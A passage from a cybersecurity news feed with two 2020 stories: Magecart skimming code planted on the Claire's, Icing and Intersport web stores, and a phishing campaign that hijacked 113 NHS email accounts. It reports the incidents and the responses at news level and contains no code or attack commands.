Despite the extra lockdown-related workload, IT professionals pointed to the lack of a commute (44%) and more flexible working hours (19%) as benefits, and 16% said they have been more productive.

Categories: Cyber Risk News

Magecart Attackers Target Retail Brands Under Lockdown

Tue, 06/16/2020 - 09:20
Magecart Attackers Target Retail Brands Under Lockdown

Magecart attackers have been busy again, installing digital skimming code onto the websites of several popular retailers over recent weeks.

The first brand affected was US accessories provider Claire’s. Security company Sansec spotted an unknown third party registering the “claires-assets” domain back in March, just after the chain decided to shut all of its stores.

“For the next four weeks, Sansec did not observe suspicious activity, but in the last week of April, malicious code was added to the online stores of Claire’s and its sister brand Icing,” it continued.

“The injected code would intercept any customer information that was entered during checkout, and send it to the server. The malware was present until June 13.”

Unlike many Magecart efforts which compromise sites by attacking their digital supply chain partners, this was a direct attack with the hackers gaining write access to code.

However, the root cause of the compromise is not yet known: Sansec hypothesized that leaked admin credentials, spear-phishing of staff and/or a compromised internal network may have been to blame.

The firm responded quickly to Sansec’s private disclosure of the incident, and urged online shoppers to monitor their bank statements.

“Our investigation identified the unauthorized insertion of code to our e-commerce platform designed to obtain payment card data entered by customers during the checkout process,” it said in a statement sent to Sansec.

“We removed that code and have taken additional measures to reinforce the security of our platform. We are working diligently to determine the transactions that were involved so that we can notify those individuals. Cards used in our retail stores were not affected by this issue.”

Also on Monday, security firm ESET warned that online shoppers in the Balkans may have had their card details stolen from Intersport stores. It claimed that the popular sports retailer fixed the issue “within several hours” after the firm sounded the alarm. Consumers in Croatia, Serbia, Slovenia, Montenegro and Bosnia and Herzegovina were affected.

Worryingly for the brands affected, research from SiteLock late last year found that a third of consumers never again shop with a retailer their information is stolen from.

Categories: Cyber Risk News

NHS: 100+ Email Accounts Hijacked in Phishing Campaign

Tue, 06/16/2020 - 08:25
NHS: 100+ Email Accounts Hijacked in Phishing Campaign

The NHS has confirmed that 113 internal email accounts were compromised and used to send malicious spam outside the health service around two weeks ago.

A brief NHS Digital statement issued on Friday revealed that the incident occurred between Saturday May 30 and Monday June 1 2020.

It claimed the security snafu affected a “very small proportion” of NHS email accounts, around 0.008% of the 1.4 million total, and was linked to a wider campaign designed to steal victims’ log-ins.

“There is currently no evidence to suggest that patient records have been accessed. We are working closely with the National Cyber Security Centre (NCSC), who are investigating a widespread phishing campaign against a broad range of organizations across the UK,” it added.

In fact, the NCSC first raised the alarm about the campaign back in October last year, claiming that automated attacks designed to harvest credentials had been active since at least July 2018 and were spreading “indiscriminately” across multiple verticals.

“In this campaign, the user receives a phishing email from a legitimate and known email account which has been compromised. Phishing emails were previously sent from contacts in recent email communications with the recipient, and the subject lines often mirrored the most recent email exchange. This created an initial plausibility for the user to trust the email,” it explained.

“More recently, the subject lines include the compromised user’s address-book entry for the recipient of the phishing email. This could be in the recipient’s name, the email address or may just be blank.”

Clicking on a link in the email would take the user to a fake log-in page featuring their organization’s logo and their email, the NCSC said.

All those affected by the latest NHS-based attacks will have been notified by today, NHS Digital claimed. It argued that since implementing a “new password approach” there has actually been a 94% decrease in phishing emails sent to NHSmail accounts over the past year.

“We are investigating this issue and have taken the precaution of asking all mailboxes that have a similar configuration to the compromised accounts to change their passwords with immediate effect,” NHS Digital concluded.

“We have worked with the organizations involved to isolate affected accounts, supported them to make any necessary changes and have advised affected individuals.”

Categories: Cyber Risk News